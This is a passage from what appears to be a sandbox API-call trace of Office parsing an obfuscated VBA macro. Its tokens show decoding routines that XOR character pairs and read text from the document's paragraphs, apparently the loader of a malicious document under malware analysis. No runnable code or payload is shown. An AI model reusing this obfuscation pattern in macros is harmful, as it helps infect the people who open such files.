pv=0x811c0e0, cb=0x100) returned 0x810a1a0 [0045.079] IMalloc:Realloc (This=0x7feff045380, pv=0x810a1a0, cb=0x200) returned 0x8060020 [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CS") returned 0x105cd7 [0045.079] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="CS" | out: _Dst="CS") returned 0x0 [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UpperPart") returned 0x10a55d [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LowerPart") returned 0x1047f4 [0045.079] atoi (_Str="0") returned 0 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.080] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.080] atoi (_Str="1") returned 1 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0045.080] atoi (_Str="2") returned 2 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CS") returned 0x105cd7 [0045.080] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="CS" | out: _Dst="CS") returned 0x0 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CS") returned 0x105cd7 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetDecChar") returned 0x1077bd [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0045.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.080] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Duren") returned 0x1098d2 [0045.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2b86, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2b86, cbMultiByte=5, lpWideCharStr=0x27651d8, cchWideChar=5 | out: lpWideCharStr="Duren") returned 5 [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KL") returned 0x105df8 [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fli") returned 0x108ee1 [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="trm") returned 0x10daa1 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tyu") returned 0x10db18 [0045.082] atoi (_Str="1231") returned 1231 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0045.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee406eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0045.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee406eba0, cbMultiByte=-1, lpWideCharStr=0x27651d8, cchWideChar=9 | out: lpWideCharStr="21789111") returned 9 [0045.082] VarI4FromStr (in: strIn="21789111", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee406ea10 | out: plOut=0x7fee406ea10) returned 0x0 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="why") returned 0x10e3e9 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tyu") returned 0x10db18 [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0045.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tyu") returned 0x10db18 [0045.083] IMalloc:Realloc (This=0x7feff045380, pv=0x7fdb8d0, cb=0x980) returned 0x81f5ba0 [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KL") returned 0x105df8 [0045.083] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="KL" | out: _Dst="KL") returned 0x0 [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ruti") returned 0x107563 [0045.083] atoi (_Str="589") returned 589 [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ruti") returned 0x107563 [0045.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e96, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0045.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e96, cbMultiByte=4, lpWideCharStr=0x27651d8, cchWideChar=4 | out: lpWideCharStr="ruti") returned 4 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UA") returned 0x105f5f [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.084] IMalloc:Realloc (This=0x7feff045380, pv=0x8060020, cb=0x400) returned 0x3ea3ad0 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UA") returned 0x105f5f [0045.084] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="UA" | out: _Dst="UA") returned 0x0 [0045.084] atoi (_Str="589") returned 589 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jbl__91") returned 0x10dee6 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Yobna") returned 0x1052f6 [0045.084] atoi (_Str="186") returned 186 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rerid") returned 0x10393e [0045.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2f32, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2f32, cbMultiByte=5, lpWideCharStr=0x27651d8, cchWideChar=5 | out: lpWideCharStr="Rerid") returned 5 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2f5a, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0045.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2f5a, cbMultiByte=12, lpWideCharStr=0x7d55518, cchWideChar=12 | out: lpWideCharStr="GutDicSher65") returned 12 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.085] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="ET" | out: _Dst="ET") returned 0x0 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MMX_____2") returned 0x108e64 [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MMX_____2") returned 0x108e64 [0045.086] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="MMX_____2" | out: _Dst="MMX_____2") returned 0x0 [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.086] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.086] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DecScr") returned 0x10ce22 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DecScr") returned 0x10ce22 [0045.087] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="DecScr" | out: _Dst="DecScr") returned 0x0 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.087] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.087] atoi (_Str="1") returned 1 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.087] atoi (_Str="1") returned 1 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0045.087] atoi (_Str="2") returned 2 [0045.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DecScr") returned 0x10ce22 [0045.087] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="DecScr" | out: _Dst="DecScr") returned 0x0 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DecScr") returned 0x10ce22 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LOtDicSmal") returned 0x10be7e [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.088] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.088] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="GutDicSher65" | out: _Dst="GutDicSher65") returned 0x0 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DecScr") returned 0x10ce22 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LOtDicSmal") returned 0x10be7e [0045.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2fde, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0045.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2fde, cbMultiByte=10, lpWideCharStr=0x27651d8, cchWideChar=10 | out: lpWideCharStr="LOtDicSmal") returned 10 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.089] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="ET" | out: _Dst="ET") returned 0x0 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.089] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UP") returned 0x105f6e [0045.089] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x33f0000 [0045.090] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LP") returned 0x105e21 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.091] IMalloc:Realloc (This=0x7feff045380, pv=0x3ea3ad0, cb=0x800) returned 0x81f6530 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WWW") returned 0x10e5f0 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.091] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="u" | out: _Dst="u") returned 0x0 [0045.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.091] atoi (_Str="1") returned 1 [0045.092] atoi (_Str="2") returned 2 [0045.092] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.092] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="u" | out: _Dst="u") returned 0x0 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0045.093] atoi (_Str="16") returned 16 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.093] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="u" | out: _Dst="u") returned 0x0 [0045.093] atoi (_Str="0") returned 0 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.093] atoi (_Str="16") returned 16 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WWW") returned 0x10e5f0 [0045.093] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="WWW" | out: _Dst="WWW") returned 0x0 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Asc") returned 0x107521 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.093] atoi (_Str="3") returned 3 [0045.093] atoi (_Str="2") returned 2 [0045.093] atoi (_Str="1") returned 1 [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u") returned 0x10106c [0045.093] atoi (_Str="1") returned 1 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UP") returned 0x105f6e [0045.094] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="UP" | out: _Dst="UP") returned 0x0 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetCorrPart") returned 0x10a005 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Asc") returned 0x107521 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.094] atoi (_Str="1") returned 1 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LP") returned 0x105e21 [0045.094] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="LP" | out: _Dst="LP") returned 0x0 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetCorrPart") returned 0x10a005 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Asc") returned 0x107521 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0045.094] atoi (_Str="1") returned 1 [0045.094] atoi (_Str="1") returned 1 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LOtDicSmal") returned 0x10be7e [0045.094] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="LOtDicSmal" | out: _Dst="LOtDicSmal") returned 0x0 [0045.094] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JitLohSup") returned 0x103bad [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UP") returned 0x105f6e [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LP") returned 0x105e21 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WWW") returned 0x10e5f0 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JitLohSup") returned 0x103bad [0045.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0182, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0045.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0182, cbMultiByte=9, lpWideCharStr=0x27651d8, cchWideChar=9 | out: lpWideCharStr="JitLohSup") returned 9 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UPart") returned 0x1013e2 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LPart") returned 0x10f2e7 [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LDR") returned 0x10add8 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JitLohSup") returned 0x103bad [0045.096] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="JitLohSup" | out: _Dst="JitLohSup") returned 0x0 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UPart") returned 0x1013e2 [0045.096] atoi (_Str="7") returned 7 [0045.096] atoi (_Str="9") returned 9 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LPart") returned 0x10f2e7 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LDR") returned 0x10add8 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetCorrPart") returned 0x10a005 [0045.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0156, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0045.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0156, cbMultiByte=11, lpWideCharStr=0x27651d8, cchWideChar=11 | out: lpWideCharStr="GetCorrPart") returned 11 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Part") returned 0x107ef4 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.097] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Part") returned 0x107ef4 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.097] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.097] atoi (_Str="48") returned 48 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] atoi (_Str="57") returned 57 